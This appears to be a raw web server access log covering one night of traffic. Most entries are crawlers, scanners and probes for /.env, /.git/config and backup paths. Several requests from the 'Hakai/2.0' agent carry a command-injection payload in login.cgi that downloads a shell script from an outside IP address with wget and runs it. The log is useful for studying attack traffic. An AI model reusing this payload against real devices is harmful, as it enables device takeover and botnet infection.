139.162.71.210 - - [21/Jan/2025:01:00:52 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.136 - - [21/Jan/2025:01:01:56 +0100] "GET /renault.2web.at/stats/lang/awstats-tr.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [21/Jan/2025:01:09:11 +0100] "GET /renault.2web.at/stats/lang/awstats-es.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
121.25.207.234 - - [21/Jan/2025:01:10:33 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.135 - - [21/Jan/2025:01:13:12 +0100] "GET /renault.2web.at/stats/lang/awstats-ba.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [21/Jan/2025:01:17:12 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109071603_RenOrder.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [21/Jan/2025:01:21:12 +0100] "GET /docs/ecommlogistics/belege/RE2016.PDF HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
195.46.106.38 - - [21/Jan/2025:01:28:41 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
156.59.198.136 - - [21/Jan/2025:01:37:56 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00017.pdf HTTP/1.0" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
51.15.19.173 - - [21/Jan/2025:01:43:38 +0100] "CONNECT web.realsysadm.in:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
161.8.64.229 - - [21/Jan/2025:01:46:08 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.135 - - [21/Jan/2025:01:53:31 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image018.jpg HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [21/Jan/2025:01:57:32 +0100] "GET /renault.2web.at/stats/lang/awstats-is.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [21/Jan/2025:02:01:32 +0100] "GET /renault.2web.at/stats/lang/awstats-mk.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
18.223.119.106 - - [21/Jan/2025:02:06:08 +0100] "\x16\x03\x01" 400 383 "-" "-"
18.223.119.106 - - [21/Jan/2025:02:07:48 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
156.59.198.135 - - [21/Jan/2025:02:13:33 +0100] "GET /docs/contadino/2018/AUFTRAG/AB18-00006.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.134.109.31 - - [21/Jan/2025:02:22:37 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
5.181.190.248 - - [21/Jan/2025:02:22:52 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
3.134.109.31 - - [21/Jan/2025:02:25:52 +0100] "\x16\x03\x01" 400 383 "-" "-"
174.138.62.1 - - [21/Jan/2025:02:35:39 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-J327T1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36"
3.134.109.31 - - [21/Jan/2025:02:37:18 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.134.109.31 - - [21/Jan/2025:02:40:33 +0100] "\x16\x03\x01" 400 383 "-" "-"
205.210.31.74 - - [21/Jan/2025:02:45:27 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
104.131.122.22 - - [21/Jan/2025:02:51:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible)"
104.131.122.22 - - [21/Jan/2025:02:51:07 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://212.69.160.11/" "Mozilla/5.0 (compatible)"
3.134.109.31 - - [21/Jan/2025:02:52:03 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
174.138.62.1 - - [21/Jan/2025:02:53:15 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/605.1"
156.59.198.135 - - [21/Jan/2025:02:53:18 +0100] "GET /docs/contadino/2017/GS17-000004.pdf HTTP/1.0" 404 301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.134.109.31 - - [21/Jan/2025:02:55:12 +0100] "\x16\x03\x01" 400 383 "-" "-"
49.0.65.53 - - [21/Jan/2025:02:57:37 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
156.59.198.135 - - [21/Jan/2025:03:01:31 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009010903_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.134.109.31 - - [21/Jan/2025:03:05:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
185.242.226.116 - - [21/Jan/2025:03:06:22 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "python-requests/2.26.0"
185.242.226.116 - - [21/Jan/2025:03:06:22 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0"
156.59.198.136 - - [21/Jan/2025:03:07:46 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00005.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.211.57.19 - - [21/Jan/2025:03:08:18 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
3.134.109.31 - - [21/Jan/2025:03:08:48 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.136 - - [21/Jan/2025:03:23:48 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104261803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
205.210.31.79 - - [21/Jan/2025:03:25:14 +0100] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.242.226.116 - - [21/Jan/2025:03:25:23 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.196.220.253 - - [21/Jan/2025:03:37:50 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
80.82.77.202 - - [21/Jan/2025:03:44:44 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
90.156.249.18 - - [21/Jan/2025:03:49:41 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
3.134.109.31 - - [21/Jan/2025:04:00:18 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
156.59.198.136 - - [21/Jan/2025:04:00:48 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911291603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.134.109.31 - - [21/Jan/2025:04:00:48 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.136 - - [21/Jan/2025:04:04:48 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image153.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [21/Jan/2025:04:08:49 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911071503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [21/Jan/2025:04:12:49 +0100] "GET /renault.2web.at/stats/lang/awstats-hu.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [21/Jan/2025:04:16:49 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00004.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [21/Jan/2025:04:20:50 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108121103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
176.210.122.62 - - [21/Jan/2025:04:24:05 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.135 - - [21/Jan/2025:04:24:50 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00011.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.129.195.58 - - [21/Jan/2025:04:28:15 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.135 - - [21/Jan/2025:04:28:50 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109241103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.129.195.58 - - [21/Jan/2025:04:30:39 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
34.22.213.78 - - [21/Jan/2025:04:42:33 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
45.156.129.133 - - [21/Jan/2025:04:44:10 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.46 - - [21/Jan/2025:04:44:11 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 302 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
95.214.55.43 - - [21/Jan/2025:04:52:26 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
118.31.21.24 - - [21/Jan/2025:04:57:06 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.135 - - [21/Jan/2025:05:01:52 +0100] "GET /renault.2web.at/stats/lang/awstats-de.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
54.91.165.109 - - [21/Jan/2025:05:04:14 +0100] "HEAD /wordpress HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
54.91.165.109 - - [21/Jan/2025:05:04:14 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
54.91.165.109 - - [21/Jan/2025:05:04:14 +0100] "HEAD /wp HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
54.91.165.109 - - [21/Jan/2025:05:04:15 +0100] "HEAD /bc HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
54.91.165.109 - - [21/Jan/2025:05:04:15 +0100] "HEAD /bk HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
54.91.165.109 - - [21/Jan/2025:05:04:15 +0100] "HEAD /backup HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
54.91.165.109 - - [21/Jan/2025:05:04:15 +0100] "HEAD /old HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
54.91.165.109 - - [21/Jan/2025:05:04:15 +0100] "HEAD /new HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
54.91.165.109 - - [21/Jan/2025:05:04:16 +0100] "HEAD /main HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
54.91.165.109 - - [21/Jan/2025:05:04:16 +0100] "HEAD /home HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.190.28.21 - - [21/Jan/2025:05:16:13 +0100] "GET /.env HTTP/1.1" 404 280 "-" "python-requests/2.32.3"
156.59.198.136 - - [21/Jan/2025:05:19:57 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/rgba8_bk.png HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [21/Jan/2025:05:24:21 +0100] "GET /renault.2web.at/stats/lang/awstats-sk.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.134.109.31 - - [21/Jan/2025:05:30:15 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.134.109.31 - - [21/Jan/2025:05:33:34 +0100] "\x16\x03\x01" 400 383 "-" "-"
3.15.182.42 - - [21/Jan/2025:05:34:08 +0100] "\x16\x03\x01" 400 383 "-" "-"
3.15.182.42 - - [21/Jan/2025:05:36:11 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
165.154.13.192 - - [21/Jan/2025:05:36:42 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
149.202.86.139 - - [21/Jan/2025:05:41:22 +0100] "GET /robots.txt HTTP/1.1" 404 362 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
149.202.86.139 - - [21/Jan/2025:05:41:28 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
123.249.12.214 - - [21/Jan/2025:05:52:33 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.135 - - [21/Jan/2025:05:57:37 +0100] "GET /renault.2web.at/stats/lang/awstats-bg.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
64.62.197.159 - - [21/Jan/2025:06:09:06 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.135 - - [21/Jan/2025:06:12:49 +0100] "GET /renault.2web.at/stats/lang/awstats-pt.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.134.109.31 - - [21/Jan/2025:06:17:53 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
156.59.198.136 - - [21/Jan/2025:06:20:50 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002011003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.134.109.31 - - [21/Jan/2025:06:21:16 +0100] "\x16\x03\x01" 400 383 "-" "-"
46.19.138.234 - - [21/Jan/2025:06:23:23 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.129.195.58 - - [21/Jan/2025:06:23:54 +0100] "\x16\x03\x01" 400 383 "-" "-"
3.129.195.58 - - [21/Jan/2025:06:26:11 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
8.217.171.143 - - [21/Jan/2025:06:27:27 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
8.217.171.143 - - [21/Jan/2025:06:28:04 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
8.217.171.143 - - [21/Jan/2025:06:28:04 +0100] "GET /layout.php HTTP/1.1" 200 1674 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
8.217.171.143 - - [21/Jan/2025:06:28:05 +0100] "GET /entry.php?id=10441&UIN= HTTP/1.1" 200 2866 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
8.217.171.143 - - [21/Jan/2025:06:28:06 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
64.226.79.183 - - [21/Jan/2025:06:35:27 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
156.59.198.135 - - [21/Jan/2025:06:53:19 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010211203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
146.19.24.18 - - [21/Jan/2025:06:54:57 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
47.128.115.113 - - [21/Jan/2025:06:57:19 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.14.68.101 - - [21/Jan/2025:06:57:52 +0100] "\x16\x03\x01" 400 383 "-" "-"
3.14.68.101 - - [21/Jan/2025:06:59:28 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
156.59.198.135 - - [21/Jan/2025:07:01:18 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201907291503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [21/Jan/2025:07:05:19 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00009.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [21/Jan/2025:07:09:19 +0100] "GET /docs/contadino/2018/ANGEBOT/AG18-00001.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
183.207.45.109 - - [21/Jan/2025:07:12:43 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
47.128.41.23 - - [21/Jan/2025:07:13:19 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
112.119.183.68 - - [21/Jan/2025:07:15:38 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
178.150.201.191 - - [21/Jan/2025:07:15:39 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.135 - - [21/Jan/2025:07:17:19 +0100] "GET /renault.2web.at/stats/lang/awstats-ru.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
146.19.24.168 - - [21/Jan/2025:07:19:10 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
179.43.191.146 - - [21/Jan/2025:07:33:46 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.196.220.253 - - [21/Jan/2025:07:34:32 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
3.15.182.42 - - [21/Jan/2025:07:37:12 +0100] "\x16\x03\x01" 400 383 "-" "-"
3.15.182.42 - - [21/Jan/2025:07:38:55 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
156.59.198.135 - - [21/Jan/2025:07:39:18 +0100] "GET /renault.2web.at/stats/lang/awstats-nl.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [21/Jan/2025:07:43:18 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00001.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [21/Jan/2025:07:47:19 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00007.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
123.249.12.214 - - [21/Jan/2025:07:56:13 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.135 - - [21/Jan/2025:08:09:17 +0100] "GET /renault.2web.at/stats/lang/awstats-ko.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.181.190.248 - - [21/Jan/2025:08:10:03 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [21/Jan/2025:08:13:17 +0100] "GET /renault.2web.at/stats/lang/awstats-cy.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
